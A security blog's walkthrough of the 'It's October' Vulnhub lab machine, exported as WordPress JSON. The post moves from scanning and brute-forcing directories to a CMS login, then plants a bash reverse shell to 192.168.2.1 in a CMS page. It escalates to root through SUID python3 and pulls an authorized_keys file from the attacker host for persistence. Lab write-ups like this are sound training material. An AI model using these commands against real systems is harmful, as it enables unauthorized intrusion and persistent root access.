{"id":25948,"date":"2020-04-07T16:57:53","date_gmt":"2020-04-07T11:27:53","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25948"},"modified":"2020-04-11T01:10:49","modified_gmt":"2020-04-10T19:40:49","slug":"its-october-vulnhub-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","title":{"rendered":"It’s October Vulnhub Walkthrough"},"content":{"rendered":"

Here is a walkthrough of the “It’s October” Vulnhub challenge<\/strong><\/a>. It’s October is an easy box for beginners and wannabe hackers, built for learning about October CMS and enumeration. The box was designed by Akanksha Verma<\/a>. What makes this machine unique is that it teaches you how a CMS can be exploited even when you can’t find any known vulnerability.<\/p>\n


Pentester Methodology<\/h3>\n

Network Scanning<\/h5>\n
    \n
  • nmap<\/li>\n
  • netdiscover<\/li>\n<\/ul>\n
    Enumeration<\/h5>\n
      \n
    • nikto<\/li>\n
    • gobuster<\/li>\n
    • placing of reverse shell<\/li>\n<\/ul>\n
      Privilege Escalation<\/h5>\n
        \n
      • abusing SETUID<\/li>\n<\/ul>\n

        Network Discovery<\/h3>\n

        To get the IP address of the machine I used netdiscover, as I had allotted a host-only adapter to my machine.<\/p>\n

        #netdiscover -i vboxnet0\r\n\r\nCurrently scanning: 192.168.157.0\/16   |   Screen View: Unique Hosts                                                                                        \r\n4 Captured ARP Req\/Rep packets, from 2 hosts.   Total size: 222               \r\n_____________________________________________________________________________\r\n  IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \r\n-----------------------------------------------------------------------------\r\n192.168.2.2     08:00:27:ac:26:45      1      42  PCS Systemtechnik GmbH      \r\n192.168.2.12    08:00:27:cb:f2:fb      3     180  PCS Systemtechnik GmbH<\/pre>\n

        And I got the machine’s IP: 192.168.2.12.<\/strong> Now let’s begin with an nmap scan.<\/p>\n

        #nmap -A -O -sS -sC -p- 192.168.2.12\r\n\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-06 18:59 IST\r\nNmap scan report for 192.168.2.12\r\nPORT     STATE SERVICE VERSION\r\n22\/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\r\n| ssh-hostkey: \r\n|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)\r\n|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)\r\n80\/tcp   open  http    Apache httpd 2.4.38 ((Debian))\r\n|_http-server-header: Apache\/2.4.38 (Debian)\r\n|_http-title: Homepage | My new websites\r\n3306\/tcp open  mysql   MySQL (unauthorized)\r\n8080\/tcp open  http    Apache httpd 2.4.38 ((Debian))\r\n|_http-open-proxy: Proxy might be redirecting requests\r\n|_http-server-header: Apache\/2.4.38 (Debian)\r\n|_http-title: My Note\r\nMAC Address: 08:00:27:CB:F2:FB (Oracle VirtualBox virtual NIC)\r\n<\/pre>\n

        I saw that ports 80<\/strong> and 8080<\/strong> are open, so without any delay, I visited the page.<\/p>\n


        It’s just a normal website. I didn’t find anything useful in the page source, but I kept moving forward.<\/p>\n


        This is also a simple web page, but it contains a clue in the page source<\/strong> to visit 192.168.2.12\/mynote.txt<\/strong><\/p>\n


        We got credentials for the CMS, admin:adminadmin2. <\/strong>I used nikto<\/strong> for further enumeration, but it didn’t turn up much.<\/p>\n

        So I tried directory brute-forcing. I used gobuster<\/strong> and found a directory, \/backend<\/strong>, that returns status code 302.<\/p>\n

        #gobuster dir -w \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt  -u http:\/\/192.168.2.12\r\n\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n[+] Url:            http:\/\/192.168.2.12\r\n[+] Threads:        10\r\n[+] Wordlist:       \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt\r\n[+] Status codes:   200,204,301,302,307,401,403\r\n[+] User Agent:     gobuster\/3.0.1\r\n[+] Timeout:        10s\r\n===============================================================\r\n2020\/04\/06 19:14:00 Starting gobuster\r\n===============================================================\r\n\/themes (Status: 301)\r\n\/modules (Status: 301)\r\n\/0 (Status: 200)\r\n\/storage (Status: 301)\r\n\/plugins (Status: 301)\r\n\/backend (Status: 302)\r\n\/vendor (Status: 301)\r\n\/config (Status: 301)\r\nProgress: 13383 \/ 220561 (6.07%)^C\r\n[!] Keyboard interrupt detected, terminating.\r\n===============================================================\r\n2020\/04\/06 19:22:15 Finished\r\n===============================================================<\/pre>\n

        Eureka. We got the login page of October CMS. I used the credentials found earlier to log in.<\/p>\n


        And we are in. The first checkpoint is reached. Now we need to place a reverse shell in the CMS in order to get a shell. For that, open the CMS tab<\/strong> on the Dashboard > <\/strong>click +ADD > <\/strong>enter the details of the page along with the shell > Save it.<\/strong><\/p>\n

        function onstart(){\r\n     exec(\"\/bin\/bash -c 'bash -i > \/dev\/tcp\/192.168.2.1\/1505 0>&1'\");\r\n}<\/pre>\n


        Now start the listener on the local machine, then open the new web page to trigger it.<\/p>\n

        #nc -nlvp 1505\r\n\r\nlistening on [any] 1505 ...\r\nconnect to [192.168.2.1] from (UNKNOWN) [192.168.2.12] 4038\r\nbash-5.0$ id\r\n uid=33(www-data) gid=33(www-data) groups=33(www-data)<\/pre>\n

        Privilege Escalation:<\/h3>\n

        For privilege escalation, I found nothing except a local user named armour<\/strong>. Then we checked for SUID binaries:<\/p>\n

        bash-5.0$ find \/ -perm -u=s -type f 2>\/dev\/null\r\n\r\n\/usr\/bin\/newgrp\r\n\/usr\/bin\/su\r\n\/usr\/bin\/python3\r\n\/usr\/bin\/passwd\r\n\/usr\/bin\/chfn\r\n\/usr\/bin\/chsh\r\n\/usr\/bin\/mount\r\n\/usr\/bin\/umount\r\n\/usr\/bin\/python3.7\r\n\/usr\/bin\/gpasswd\r\n\/usr\/lib\/eject\/dmcrypt-get-device\r\n\/usr\/lib\/openssh\/ssh-keysign\r\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper<\/pre>\n


        So the SUID<\/strong> bit is set on \/bin\/python3.<\/strong> We can use this to get root.<\/p>\n

        bash-5.0$ cd \/tmp\/\r\nbash-5.0$ vim armour.py \r\n\r\n #!\/usr\/bin\/python\r\n import os\r\n os.execl(\"\/bin\/bash\",\"sh\",\"-p\")\r\n ~                                                                               \r\n ~                                                                               \r\n ~                                                                               \r\n ~                                                                               \r\n :wq!\r\n                                                                                                \r\nbash-5.0$ chmod 777 armour.py \r\nbash-5.0$ python3 armour.py \r\n\r\nsh-5.0# id\r\nuid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)\r\nsh-5.0# cd \/root\/\r\nsh-5.0# ls\r\nproof.txt\r\nsh-5.0# cat proof.txt \r\nBest of Luck\r\n$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq\r\n<\/pre>\n

        BOOM! We have the flag and an euid of root! But we need a proper shell, so I transferred an authorized_keys file to the machine and connected over SSH.<\/p>\n

        sh-5.0# cd \/root\/.ssh\r\nsh-5.0# wget http:\/\/192.168.2.1:8080\/authorized_keys \r\n--2020-04-06 10:23:55--  http:\/\/192.168.2.1:8080\/authorized_keys\r\nConnecting to 192.168.2.1:8080... connected.\r\nHTTP request sent, awaiting response... 200 OK\r\nLength: 569 [application\/octet-stream]\r\nSaving to: \u2018authorized_keys\u2019\r\n\r\nauthorized_keys     100%[===================>]     569  --.-KB\/s    in 0s      \r\n\r\n2020-04-06 10:23:55 (41.3 MB\/s) - \u2018authorized_keys\u2019 saved [569\/569]\r\n\r\nsh-5.0# ls \r\nauthorized_keys\r\n\r\n#ssh 192.168.2.12\r\nThe authenticity of host '192.168.2.12 (192.168.2.12)' can't be established.\r\nECDSA key fingerprint is SHA256:DYZkjGYMu99f1Ml7F6XHJ+4Oh\/GISu41\/GP0Y+yMgpg.\r\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\r\nWarning: Permanently added '192.168.2.12' (ECDSA) to the list of known hosts.\r\n   ##############################################################################################\r\n   #                                      Armour Infosec                                        #\r\n   #                         --------- www.armourinfosec.com ------------                       #\r\n   #                                    It's October\t                                        #\r\n   #                               Designed By  :- Akanksha Sachin Verma                        #\r\n   #                               Twitter      :- @akankshavermasv                             #\r\n   ##############################################################################################                                       IP:\\4\r\n                                       Hostname: \\n\r\nDebian GNU\/Linux 10\r\nLinux october 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64The programs included with the Debian GNU\/Linux system are free software;\r\nthe exact distribution terms for each program are described in the\r\nindividual files in 
\/usr\/share\/doc\/*\/copyright.\r\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\r\npermitted by applicable law.\r\nLast login: Fri Mar 27 10:53:25 2020 from 192.168.1.6\r\n\r\nroot@october:~# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\nroot@october:~# hostname\r\noctober\r\nroot@october:~# uname -a\r\nLinux october 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU\/Linux\r\nroot@october:~# cd \r\nroot@october:~# cat proof.txt \r\nBest of Luck\r\n$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"

        Here’s the new challenge of “It’s October Vulnhub Walkthrough”.\u00a0 It’s October is an easy box for the beginner and wannabe…<\/p>\n","protected":false},"author":1,"featured_media":25950,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[119,126,118],
"yoast_head_json":{"title":"It's October Vulnhub Walkthrough - Armour Infosec","description":"Here's the new challenge of \"It's October Vulnhub Walkthrough\".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"It's October Vulnhub Walkthrough - Armour Infosec","og_description":"Here's the new challenge of \"It's October Vulnhub Walkthrough\".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.","og_url":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","og_site_name":"Armour Infosec","article_publisher":"https:\/\/www.facebook.com\/ArmourInfosec","article_published_time":"2020-04-07T11:27:53+00:00","article_modified_time":"2020-04-10T19:40:49+00:00","og_image":[{"width":1366,"height":768,"url":"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-06-19-02-19.png","type":"image\/png"}],"author":"Armour Infosec","twitter_card":"summary_large_image","twitter_creator":"@ArmourInfosec","twitter_site":"@ArmourInfosec","twitter_misc":{"Written by":"Armour Infosec","Est. 
reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","url":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","name":"It's October Vulnhub Walkthrough - Armour Infosec","isPartOf":{"@id":"https:\/\/www.armourinfosec.com\/#website"},"datePublished":"2020-04-07T11:27:53+00:00","dateModified":"2020-04-10T19:40:49+00:00","author":{"@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308"},"description":"Here's the new challenge of \"It's October Vulnhub Walkthrough\".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.","breadcrumb":{"@id":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.armourinfosec.com\/"},{"@type":"ListItem","position":2,"name":"It’s October Vulnhub Walkthrough"}]},{"@type":"WebSite","@id":"https:\/\/www.armourinfosec.com\/#website","url":"https:\/\/www.armourinfosec.com\/","name":"Armour Infosec","description":"Do Your Part - Be Security Smart","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.armourinfosec.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308","name":"Armour 
Infosec","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","caption":"Armour Infosec"},"sameAs":["https:\/\/www.armourinfosec.com\/"],"url":"https:\/\/www.armourinfosec.com\/author\/admin\/"}]}},"menu_order":0,"_links":{"self":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25948"}],"collection":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/comments?post=25948"}],"version-history":[{"count":0,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25948\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media\/25950"}],"wp:attachment":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media?parent=25948"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/categories?post=25948"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/tags?post=25948"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}